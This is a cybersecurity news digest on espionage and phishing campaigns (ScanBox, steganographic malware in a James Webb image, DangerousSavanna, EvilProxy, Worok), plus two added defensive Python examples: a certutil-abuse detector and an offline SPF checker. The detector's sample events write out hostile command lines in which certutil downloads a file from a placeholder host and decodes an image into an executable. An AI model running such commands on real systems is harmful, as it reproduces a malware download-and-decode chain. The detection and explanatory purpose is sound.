At a glance.
- Espionage surrounding the South China Sea.
- Steganography used to hide malware in the James Webb telescope image.
- Financially motivated campaign targets African countries.
- Phishing-as-a-service offering on the dark web bypasses MFA.
- Worok cyberespionage group active in Central Asia and the Middle East.
Espionage surrounding the South China Sea.
Researchers at Proofpoint and PwC have published a report on a Chinese espionage campaign that's targeting Australian government and media organizations, as well as "global heavy industry manufacturers which conduct maintenance of fleets of wind turbines in the South China Sea." Proofpoint tracks the actor as "Red Ladon," and notes that it has overlaps with the threat actor tracked publicly as APT40 and Leviathan:
"Beginning on 12 April 2022, and continuing through mid-June 2022, Proofpoint identified several waves of a phishing campaign resulting in the execution of the ScanBox reconnaissance framework, in part based on intelligence shared by PwC Threat Intelligence related to ongoing ScanBox activity. The phishing campaign involved URLs delivered in phishing emails, which redirected victims to a malicious website posing as an Australian news media outlet. The website’s landing page delivered a JavaScript ScanBox malware payload to selected targets. In historic instances, ScanBox has been delivered from websites that were the victim of strategic web compromise (SWC) attacks with legitimate sites being injected with malicious JavaScript code. In this instance, the threat actor controls the malicious site and delivers malicious code to unsuspecting users."
Steganography used to hide malware in the James Webb telescope image.
Researchers at Securonix warn that a threat actor is distributing malware using the recent deep field image of the universe from the James Webb telescope. The attackers are using phishing emails to send Microsoft Office attachments with malicious macros. When a user opens the attachment and enables macros, a command will download the JPG image file. It then uses certutil.exe to decode the image file into a malicious executable. The researchers conclude, "Using a legitimate image to build a Golang binary with Certutil is not very common in our experience or typical and something we are tracking closely. It’s clear that the original author of the binary designed the payload with both some trivial counter-forensics and anti-EDR detection methodologies in mind."
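The certutil.exe abuse described above (a living-off-the-land binary decoding a downloaded image into an executable, spawned from an Office macro) is the kind of behaviour process-creation telemetry catches well. The following is an added example, not code from Securonix or from the report; the event records, field names (`image`, `command_line`, `parent_image`) and file names are constructed to resemble Sysmon/EDR process-creation logs and are not real telemetry.

```python
"""Flag suspicious certutil.exe invocations in process-creation telemetry.

Added example for this digest. Events are constructed (assumption: each
record carries `image`, `command_line` and `parent_image` fields).
"""
import os
import shlex

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".bmp"}
EXEC_EXTS = {".exe", ".dll", ".scr"}

# Constructed sample events; paths and names are placeholders.
SAMPLE_EVENTS = [
    {  # macro-spawned certutil decoding a "JPG" into an .exe
        "image": r"C:\Windows\System32\certutil.exe",
        "command_line": r"certutil.exe -decode C:\Users\victim\AppData\Local\Temp\deepfield.jpg "
                        r"C:\Users\victim\AppData\Local\Temp\update.exe",
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    },
    {  # macro-spawned certutil fetching the image with -urlcache
        "image": r"C:\Windows\System32\certutil.exe",
        "command_line": "certutil.exe -urlcache -split -f http://example.invalid/deepfield.jpg deepfield.jpg",
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    },
    {  # benign administrative use from a shell
        "image": r"C:\Windows\System32\certutil.exe",
        "command_line": r"certutil.exe -verify C:\certs\server.cer",
        "parent_image": r"C:\Windows\System32\cmd.exe",
    },
]


def _basename(path):
    """Last path component, lower-cased; handles both Windows and POSIX separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _ext(path):
    return os.path.splitext(_basename(path))[1]


def certutil_findings(event):
    """Return the reasons this event looks like certutil abuse (empty list if benign)."""
    if _basename(event.get("image", "")) != "certutil.exe":
        return []
    # posix=False keeps Windows backslashes intact while splitting on whitespace.
    tokens = shlex.split(event.get("command_line", ""), posix=False)
    flags = {t.lstrip("-/").lower() for t in tokens if t.startswith(("-", "/"))}
    args = [t for t in tokens[1:] if not t.startswith(("-", "/"))]
    reasons = []
    if "decode" in flags or "decodehex" in flags:
        reasons.append("decode flag")
        if args and _ext(args[0]) in IMAGE_EXTS:
            reasons.append("input is an image file")
        if len(args) > 1 and _ext(args[1]) in EXEC_EXTS:
            reasons.append("output is an executable")
    if "urlcache" in flags:
        reasons.append("urlcache download")
    if reasons and _basename(event.get("parent_image", "")) in OFFICE_PARENTS:
        reasons.append("spawned by an Office application")
    return reasons


def scan(events):
    """Run the check over a list of events; each finding keeps the event index and reasons."""
    findings = []
    for i, event in enumerate(events):
        reasons = certutil_findings(event)
        if reasons:
            findings.append({"index": i, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The number of reasons is a usable severity score: a plain `-decode` from a shell is common administrative noise, while decode plus image input plus executable output plus an Office parent is the whole chain described in the report and is worth an alert on its own.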
Financially motivated campaign targets African countries.
Check Point describes "DangerousSavanna," a financially motivated campaign that's been targeting "multiple major financial service groups in French-speaking Africa for the last two years." The campaign has targeted organizations in Ivory Coast, Morocco, Cameroon, Senegal, and Togo. The threat actor uses spearphishing emails to distribute malware:
"The infection starts with spear-phishing emails written in French, usually sent to several employees of the targeted companies, all of which are medium to large financial groups in French-speaking Africa. In the early stages of the campaign, the phishing emails were sent using Gmail and Hotmail services. To increase their credibility, the actors began to use lookalike domains, impersonating other financial institutions in Africa such as the Tunisian Foreign bank, Nedbank, and others. For the last year, the actors also used spoofed email addresses of a local insurance advisory company whose domain doesn’t have an SPF record."
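The last detail in that quote, a spoofed sender domain with no SPF record, is what lets the forged mail through: a receiver evaluating SPF gets a "none" result and has no policy to enforce. The following added example (not Check Point's code) evaluates a sending IP against spf1 records the way a receiving mail server would, with DNS replaced by a constructed in-memory map of TXT records so it runs offline; all domains and addresses in it are placeholders. It covers the ip4, ip6, include and all mechanisms and the four qualifiers, which is more than the single missing-record case the report mentions.

```python
"""Offline SPF (RFC 7208) evaluator for constructed TXT records.

Added example for this digest. DNS is stubbed by TXT_RECORDS (assumption);
real code would query TXT records for the domain instead.
"""
import ipaddress

# Constructed records; domains and addresses are documentation placeholders.
TXT_RECORDS = {
    "bank.example": ["v=spf1 ip4:203.0.113.0/24 include:mailer.example -all"],
    "mailer.example": ["v=spf1 ip4:198.51.100.10 ip6:2001:db8::/32 ~all"],
    "insurer.example": [],  # publishes no SPF record, like the spoofed advisory firm
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def lookup_spf(domain):
    """Return the domain's spf1 TXT record, or None when it publishes none."""
    for txt in TXT_RECORDS.get(domain, []):
        if txt.lower().startswith("v=spf1"):
            return txt
    return None


def check_host(ip, domain, depth=0):
    """Return the SPF result for `ip` claiming to send as `domain`."""
    if depth > 10:  # recursion guard, in the spirit of the RFC 7208 lookup limit
        return "permerror"
    record = lookup_spf(domain)
    if record is None:
        return "none"  # no policy published: the receiver cannot reject on SPF grounds
    addr = ipaddress.ip_address(ip)
    for term in record.split()[1:]:  # skip the "v=spf1" version tag
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, value = term.partition(":")
        name = name.lower()
        if name == "all":
            matched = True
        elif name in ("ip4", "ip6"):
            network = ipaddress.ip_network(value, strict=False)
            matched = addr.version == network.version and addr in network
        elif name == "include":
            # include matches only when the referenced domain's policy says "pass"
            matched = check_host(ip, value, depth + 1) == "pass"
        else:
            continue  # a, mx, exists and other mechanisms are out of scope here
        if matched:
            return QUALIFIERS[qualifier]
    return "neutral"  # nothing matched and no "all" term was present


if __name__ == "__main__":
    for sender, domain in [("203.0.113.5", "bank.example"),
                           ("192.0.2.1", "bank.example"),
                           ("192.0.2.1", "insurer.example")]:
        print(sender, domain, check_host(sender, domain))
```

The third case is the one from the report: any IP on the internet gets "none" for insurer.example, so SPF contributes nothing and the decision falls back to content filtering or the recipient's judgement. A record ending in "-all" (paired with DMARC so that a failing result is actually acted on) is what turns the same forged message into a reject.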
Phishing-as-a-service offering on the dark web bypasses MFA.
Yesterday researchers at security firm Resecurity reported an interesting discovery in the criminal-to-criminal market. They’ve found a new C2C offering, called either EvilProxy or Moloch (and we note in passing that the hoods are growing increasingly direct and literal in the way they name their wares) that sells phishing-as-a-service. EvilProxy is interesting in that it shows some ability to bypass multi-factor authentication. It’s a commodity service but an advanced one. As Resecurity observes, “the productized underground service like EvilProxy enables threat actors to attack users with enabled MFA on the largest scale without the need to hack upstream services.” That is, it represents a more direct mode of attack than the recent Twilio compromise did.
It also represents an advance in criminal capability. Reverse proxy and cookie injection attacks have been seen before as ways of evading multi-factor authentication, but hitherto it had been state-directed intelligence services who’d been observed using these techniques. The methods are now being made available to criminals.
Worok cyberespionage group active in Central Asia and the Middle East.
Security firm ESET has released research into a threat group it's calling "Worok." They characterize it as sophisticated, and while "sophisticated" is thrown around a lot, in this case ESET uses it with some justice. "Worok is a cyberespionage group that develops its own tools, as well as leveraging existing tools, to compromise its targets." The motive is espionage. "Stealing information from their victims is what we believe the operators are after because they focus on high-profile entities in Asia and Africa, targeting various sectors, both private and public, but with a specific emphasis on government entities." It's unclear whom Worok is working for, despite some circumstantial overlap with other groups, some of them associated with Beijing. "Activity times and toolset indicate possible ties with TA428, but we make this assessment with low confidence. Their custom toolset includes two loaders – one in C++ and one in C# .NET – and one PowerShell backdoor." And ESET invites contributions from other researchers. "While our visibility is limited, we hope that shedding light on this group will encourage other researchers to share information about this group."